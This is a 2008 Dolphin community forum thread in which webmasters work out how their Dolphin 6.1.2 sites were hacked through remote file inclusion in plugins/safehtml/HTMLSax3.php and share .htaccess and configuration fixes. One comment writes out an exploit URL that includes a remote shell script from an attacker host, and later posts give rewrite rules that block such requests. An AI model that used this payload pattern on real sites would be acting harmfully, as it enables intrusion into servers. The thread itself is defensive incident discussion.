Securtiy Problem at Dolphin 6.1.2 ?!

realmasterd posted 9th of July 2008 in Community Voice. 31 comments.
hello from germany.

we think that dolphin 6.1.2 have a security problem!
some of german webmaster dolphin websites are hacked.

we have found this information:
http://www.astalavista.com/index.php?section=exploits&cmd=details&id=6128

antivirussoftware have found a trojaner in
\plugins\safehtml\templates.php

here the code from this file:
http://test.tunelife.de/template.txt

all access and some other thinks go to this e-mail adress:
r57ssh@gmail.com

we hope that somebody can find a solution.

greetz
http://dolphin-forum.eu
 
Comments
·Oldest
·Top
Please login to post a comment.
jerry79
Hi,
well, i dont got template.php in this directory.... So i can find it.
Any yes, the link which you post to open the file, results in a warning from AV...

Greets
Jerry
jerry79
LOL funny a "Thumbs down" for replying and saying what i see n got...
Do you know how many sites have been hacked?
Pls let us know or give us some examples.
Maybe there is a corrupted installer file anywhere on the net and these guys downloaded it.
Cause the user with the mail above is doing that shit on other plattforms also. Check google for this.
For me, i dont find anyhting about it, also not such a file... But tonight ill download my whole dir and scan it.
So from my side: No, see more risk from original package.
realmasterd
hello,

we connected the webmaster to know about 3rd mods/plugins.
for example, html in comments or something else..

if i have more i write this ;)
realmasterd
feedback:
first webmaster have this mods/plugins:
calendar, safehtml, tiny_mce

second webmaster have original dolphin version without any mods/plugins!

both was hacked.
realmasterd
here a screenshot after hack:
http://www.pictureupload.de/originals/pictures/090708153724_Unbenannt.jpg
IceHoff
Yep!! Have seen that too...
I've just put a "Deny from all" in the directories concerned by the security hole.
jerry79
Ok, i scanned the original dolphin package for gmail... Only results from authors.
Also i didnt found any templates.php inside there.
The plugins which you listed are original one which you got from the package.
So, maybe the hackr came through another hole on the server to it. As i remember, Dolphin was checked and branded as hack safe....
I think, that he maybe used a wrong mod or somethingelse. Do you know which kind of mods he installed on the server?
crswsystem
But it can not, we have no mods installed and our firewall shows no attacked from the outside, so it can only from the original file pack.
shaneed
I also wonder how is that possible. Dolphin has got Hacker Safe, that means it should be safe, right? Or who knows who are this guys from Hacker Safe; maybe they just take money from people and don't do nothing. I was called by them so many times if i want their service. They sounded so insisting...
jerry79
Well, maybe then you got the package from another side.
Yet, now, i dont know which exploid they can use to put the file through dolphin to your server...
Also it think, that then they must be a lot moreguys who got hacked. Cause when you are able to get in a system, then you are looking for another one, and its easy to search google for peeps who are running dolphin...
Its just my mind...
But we will see what a offical from boonex will say..
shaneed
If not a Dolphin security hole that Boonex omitted then must be a mod you installed that made Dolphin unsecure. Can be also from your hosting. There are some phantom hosting that are dealing with unimaginable things. I also experienced it on my own. Or just maybe because your hosting is on a Windows platform but not Linux? Because on Windows servers you cannot setup file permissions.
mikesta
I just know about three sites having problem since today, so there are mods installed, but as described on www.astalavista.com, there are some security holes.

And using them is not the hardest way. Just go to youtube and search for RFI hack und you will find a huge amount of detailed descriptions to hack sites like dolphin within a few minutes.

I think there should be some coder work done to make it safer.
DosDawg
this is my opinion, and i could be wrong. but i have seen this script before. the c99 used to have a blackwidow as a logo image.

what i believe, is that this person who had their site hacked is on a shared and in being a shared server, and this would be injected with no trace of it being used. since it would be loaded on an account that is on the server, you can then browse certain files that would give up parameters that would allow injection via of remote shell but its not remote its a php see more shell, and be able to cause these problems.

if any of you have ever been involved in wordpress, phpnuke, post nuke, e107, joomla, drupal, b2Evo or any other open source script, you have seen this same attack, and from what i know about this c99 remote shell attack its mostly on shared servers, or where you downloaded something from somebody, or allowed uploads on your site, and this was placed on your server.

specifically is dolphin vulnerable, i suppose all scripts are, and the time spent trying to secure them is astronomical. i just googeled c99 shell script, and there are 190k returns, so this is not new to dolphin, i didnt read anything that would determine what makes one site or one server more vulnerable than the next, but my point in hand is this remote shell is a well known hack amongst kids.

well i hope this sheds some light on the situation.

later,
DosDawg
Technoman
well from what i was told by someone today who knows alot more then myself about security

as i have 2 VPS servers myslef ( running LINUX )

the provider who runs these servers

"he says that any VPS server your running on can be hacked from inside from another user since most VPS servers are shared with alot of users" ...

=====

this is my thought on VPS

VPS servers are shared by alot of different users and if you plan on hosting a big site
( i would not recommend using see more VPS as everyone is hogging the memory on that server)
with example 10 people on 1 VPS just imagine how much RAM is being chewed up at 1 time because its being shared

====

( the best thing is to have a dedicated server )
+
no one shares or hogs the memeory as this machine is strictly yours like a home computer * everything is dedicated to you* )

im just telling you what ive been told about security with VPS
and hopefully this will help realize dont always think cause your hosting on a shared server that your safe cause your more at risk depending on all sorts of situations and just because the price is cheaper for VPS servers means that theres pros and cons about the whole thing ....

go with a Dedicated Server ( pay 10$ more but everything is dedicated to you )

example
29.99$ VPS Server
39.99$ dedicated Server <--- ( this is what i would choose )
DosDawg
just asking a question because this only happens every time you come around. are you tagging every post i have on here with a negative vote? you can be honest, i wont eat ya or nothing. if it is you, please refrain, if not, then carry on. but i know without a doubt that before you came in here and posted, i had one thumbs up on that post.

holla,
DosDawg
DosDawg
techno where you finding dedicated boxes for 40 bux a month? lol, i spend 225 a month for a dedicated box, maybe the managed has a little to do with that price, but a good server and good support staff are hard to come by. i found one and it costs money for good skills and good equipment.

later,
DosDawg
Technoman
There are dedicated servers out there for the same price as a VPS these days - some start as low as $29 a month!!!

Generally, a dedicated server is better than a VPS - they are the same amount of work to maintain - and at least with a dedicated one, you have 100% of the system resources 100% of the time.

Dont forget when paying 29$ a month for a Dedicated Server your not going to recieve unlimitted BANDWIDTH
( thats for sure ) ...
Technoman
as low as

19.99$ a month for a DEDICATED SERVER

http://www.millenniumdata.com/BUSINESS/Business-Default.asp?include=Business-Dedicated-Servers.asp

ive used them before with
Windows Server 2003

29.99$ ( dedicated server ) i used this 1 before and it worked great i was able to hold 1000 users ( video chat ) another chat program
with no problems at all

i recievded 1000gb of bandwidth a month
( very good for that price )

go take a look at that site ....

alot of my friends see more use it cause i told them about it
Technoman
http://www.millenniumdata.com/BUSINESS/Business-Default.asp?include=L1GAMER.asp

instead of windows server 2003 they have been replaced with windows xp for the same price

i used there 59.99$ also which is alot more BANDWIDTH
Technoman
there 29,.99$ a month for xp pro ( dedicated Server )
is a good machine
in my oppion windows xp pro is much faster then windows 2003
sammie
i also pay $230 a month for a dedicated server, i have never looked back, as with VPS and any shared hosting. a hacker can just get an account and he has access to every site thats on the shared host or VPS. none are secure.

you get what you pay for. and that is what people dont understand, a dedicated server for $50 is an old slow server but idea for running a few dolphin sites from it.
it would give you the skills to move up as your sites become popular. so for once i agree with technoman. see more and he gets a thumbs up for once
Splinter
friends, could someone reproduce the hack? I am a little bit scared to try the POC links from Altavista in my own installation in order not to infect my server by myself ... ;-)
micha_es
its the HTMLSax3.php.
Is allow_url_fopen = on (dolphin need this) than u can include everything, because HTMLSax3.php doesn´t check this

it seems like this:
http://domain.com/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://somehackdomain.cz/upload/skins/max.txt?

On the german dolphin forum i found this to make a FIRST fix:

create a .htaccess in /plugins/safehtml/
RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC,OR]
RewriteCond %{QUERY_STRING} (.*)urlx=(.*) [NC]
RewriteRule see more ^(.*) - [F]
realmasterd
hello again,

many new information.

its not directly a dolphin problem but dolphin is the way to hack server. "allow_URL_fopen" is needed for orca forum and about this the hacker can heacked a server.

they are using this file:
plugins/safehtml/HTMLSax3.php

ip from hacker was this one:
http://private.dnsstuff.com/tools/ipall.ch?domain=189.56.100.76

our solution!
edit the .htaccess file add add this:

RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC,OR]
RewriteCond see more %{QUERY_STRING} (.*)urlx=(.*) [NC]
RewriteRule ^(.*) - [F]

with this they can not include a file which is not on the server.

and you can block the ip.

best regards
nurke
so what do we do with plugins/safehtml/HTMLSax3.php ???
Please let us know
realmasterd
you can use your original .htaccess!

put this code at the end in the .htaccess, befor </IfModule>

RewriteCond %{QUERY_STRING} (.*)=http(.*) [NC,OR]
RewriteCond %{QUERY_STRING} (.*)urlx=(.*) [NC]
RewriteRule ^(.*) - [F]
realmasterd
so, in another posts i have read the solution!

register_gloabs must be off.

thanks all!
nurke
so what do we do with plugins/safehtml/HTMLSax3.php ???
Please let us know
nurke
so what do we do with plugins/safehtml/HTMLSax3.php ???
Please let us know
Truehookups
[Sun Jul 13 11:13:04 2008] [error] [client 217.217.156.81] ModSecurity: Access denied with code 406 (phase 2). Match of "rx ^apache.*perl" against "REQUEST_HEADERS:User-Agent" required. [msg "Request Indicates an automated program explored the site"] [severity "NOTICE"] [hostname "www.com"] [uri "/music/all/10/plugins/safehtml/HTMLSax3.php"] [unique_id "DL1-F0PUqYIAACsTCG4AAAAT"]
Modsecurity is blocking these 1-4 times a hour
the1kewldude
Hey guys, first I want to say that this is a great concept. I'm new here and like a lot of what I see. BUT.... There are some issues. pHp injection is the problem here and is done with remote shell scripts like c99 and r57. This happens when you "allow_URL_fopen" I have it turned off. Everyone says it must be turned on, but this is not entirely true. I suggest if you really want to stop these attacks to turn that off. There are cgi scripts that can prevent this by side stepping pHp see more in the call function and that will perform the same function in the code, while maintaining security. Mod ReWrites like the one suggested above will help as well. But, the best recommendation I can make is turn off allow_URL_fopen. Use a differnet forum platform or incorporate a cgi script. It will take a little time to sort through the code to replace, but will be well worth your time. Banning IP addresses does little help unless you block, the entire block as most of these bad guys are on dynamic accounts where the IP changes everytime they get online. These attacks are done by putting remote shell access scripts on a server. The bad guys are running bots that scan websites and find that you are using a vulnerable platform (ie Dolphin). Once they know that, they inject the code through allow_URL_fopen. These scripts are in text format, so any server allowing people to post on them is vulnerable to assisting in these attacks with out their knowledge. Most of these attacks are done by placing a script in a public place and then calling the script from another. Allowing URL_fopen poses a risk. It's just a matter of time before those of you on "dedicated servers" start experiencing these same issues. BTW- I am going through this code with a fine tooth comb and am finding that allow_URL_fopen is being used for more than just the ORCA forum. I will post more as I inspect the code. As I said in my opening statement, I like this concept and I would love to see it improved and made more secure.
Oh one other thing, most of these bad guys are using wwwlib or indy library as the user agent, blocking these agents in your .htaccess file will slow down the attacks. The only problem with that is the user agent name in the attacking library can be modified.
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.
PET:0.10340189933777